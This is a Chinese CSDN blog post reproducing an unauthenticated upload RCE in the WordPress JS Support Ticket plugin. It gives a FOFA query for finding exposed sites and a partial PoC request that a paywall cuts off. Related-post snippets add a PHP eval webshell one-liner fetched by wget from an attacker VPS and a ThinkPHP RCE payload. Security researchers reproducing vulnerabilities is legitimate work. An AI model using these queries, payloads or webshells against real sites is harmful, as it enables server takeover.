WordPress JS Support Ticket插件 RCE漏洞复现

已于 2024-04-11 14:49:24 修改
阅读量510 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-11 14:49:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137638782
版权

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。JS Support Ticket是使用在其中的一套开源票务系统插件。

0x02 漏洞概述

WordPress中的JS Support Ticket插件存在未经上传漏洞,未经身份验证的攻击者可以上传恶意脚本的服务器,执行任意指令,从而获取服务器权限。

0x03 复现环境

FOFA:body="wp-content/plugins/js-support-ticket"

0x04 漏洞复现

PoC

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=b983c629ca9b1450283a9b8d1b953898

--b983c629ca9b1450283a9b8d1b953898
Content-Disposition: form-data; name="support
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
wordpress js-support-ticket文件上传漏洞批量验证poc
weixin_43567873的博客
04-02 264
wordpress js-support-ticket文件上传漏洞批量验证poc
域渗透PTT票据传递攻击(Pass the Ticket)
Longwaer
01-21 1753
通过笔记全方位讲解,加速学习了解PTT票据传递攻击的方法及原理,更好的去掌握黄金、白银票据生成。
WordPress-RCE-EXP
04-10
WordPress-RCE-EXP 影响版本 漏洞编号:CVE-2016-10033 (基于) WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用 出现 Test_blind_shell>>> 后,说明网站存在RCE漏洞 有两种方式来漏洞利用 一、写入Webshell 1.在vps上开web服务,在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址,前面不能加http://) Test_blind_shell>>>/usr/bin/wget --
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 591
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
WordPress BuddyPress 存在越权漏洞RCE(CVE-2021-21389)
xiaobai_20190815的博客
05-11 3291
一、漏洞描述 BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题 二、影响版本 5.0.0 <BuddyPress< 7.2.1 三、漏洞环境 1、dockerhub拉镜像,docker pull hoangkien10
WordPress--mailpress RCE复现
ro4lsc的博客
03-16 7844
本文主要讲述了WordPress--mailpress RCE漏洞复现,如有纰漏,请联系笔者修改,希望能对您有所帮助。
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5261
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
WordPress Exploit-4-6 RCE CVE-2016-10033
公众号shadow sock7
05-07 1036
原文: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html绕过过滤器To exploit the PHPMailer’s mail() injection vulnerability, an attacker would have to be able to append param
CVE-2024-25600 WordPress Bricks Builder RCE-漏洞分析研究
shelter1234567的博客
03-06 2081
CVE-2024-25600 是一个严重的(CVSS 评分 9.8)远程代码执行 (RCE) 漏洞,影响 WordPress 的 Bricks Builder 插件。成功利用此漏洞可能允许未经身份验证的攻击者在受影响的基于 WordPress 的网站上远程执行任意 PHP 代码。据报道,该漏洞已被广泛利用,包括尝试在易受攻击的服务器上安装基于 PHP 的恶意 Webshell。Bricks Builder 插件版本 1.9.6.1 或更高版本中已发布解决此漏洞的补丁。Bricks Builder官方。
wordpress漏洞_聊聊 WordPress 5.1.1 CSRF to RCE 漏洞
weixin_39860919的博客
12-12 229
作者:LoRexxar'@知道创宇404实验室时间:2019年3月14日原文链接:聊聊 WordPress 5.1.1 CSRF to RCE 漏洞2019年3月13日, RIPS团队公开了一篇关于WordPress 5.1.1的XSS漏洞详情,标题起的很响亮,叫做wordpress csrf to rce, https://blog.ripstech.com/2019/wordpress-csr...
Wordpress js-support-ticket文件上传漏洞
最新发布
qq_39894062的博客
04-02 571
Wordpress js-support-ticket文件上传漏洞
WordPress爆炸性0day,直接RCE!附POC
m0_52514790的博客
02-24 928
2.漏洞路径为:/wp-json/bricks/v1/render_element,然后使用构造好的POC进行nonce的替换,直接进行命令执行,获取服务器敏感信息以及进行敏感操作。其中执行的命令可以根据自己的需要进行更改即可。1.首先访问存在WordPress Bricks Builder 插件的网站,然后右键查看网页源代码或者使用抓包工具抓取返回的数据包,直接搜索参数nonce,获取其参数值。
备份插件存在严重RCE漏洞,可导致WordPress网站遭接管
smellycat000的专栏
12-13 171
聚焦源代码安全,网罗国内外最新资讯!作者:Elizabeth Montalbano编译:代码卫士WordPress 备份插件 Backup Migration 的下载次数已超过9万次,其中存在一个严重的RCE漏洞,可导致易受攻击的 WordPress 网站遭接管。这是又一起因建站平台插件漏洞造成的风险事件。Nex Team 在 Backup Migration 插件中发现了一个 PHP 代码注入...
WordPress 5.0 RCE 详细分析
晓得哥的博客
02-25 1118
2月20号,RIPS团队在官网公开了一篇WordPress 5.0.0 Remote Code Execution,CVE编号CVE-2019-6977,文章中主要提到在author权限账号下,可以通过修改Post Meta变量覆盖、目录穿越写文件、模板包3个漏洞构成一个RCE漏洞。 但在原文中,作者只大致描述了漏洞原理,其中大量的漏洞细节被省略,甚至部分的利用和后端服务器也有相对应的关系,所以...
F5设备中存在一个Ticketbleed漏洞,可被远程攻击者利用
weixin_34245169的博客
09-25 510
本文讲的是F5设备中存在一个Ticketbleed漏洞,可被远程攻击者利用, F5 Networks BIG-IP设备中存在一个严重漏洞漏洞编号为CVE-2016-9244。该漏洞被命名为Ticketbleed,可被远程攻击者利用于窃取内存中的敏感信息,包括敏感数据(比如SSL Session ID)。 受影响的F5 BIG-IP设备包括LTM、AA...
wordpress 漏洞_轻松发现WordPress漏洞
热门推荐
culi4814的博客
08-24 1万+
wordpress 漏洞As a developer or design professional, one of the biggest benefits of building your sites on WordPress is that in most cases you are building your code on a proven platform which has been ...
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值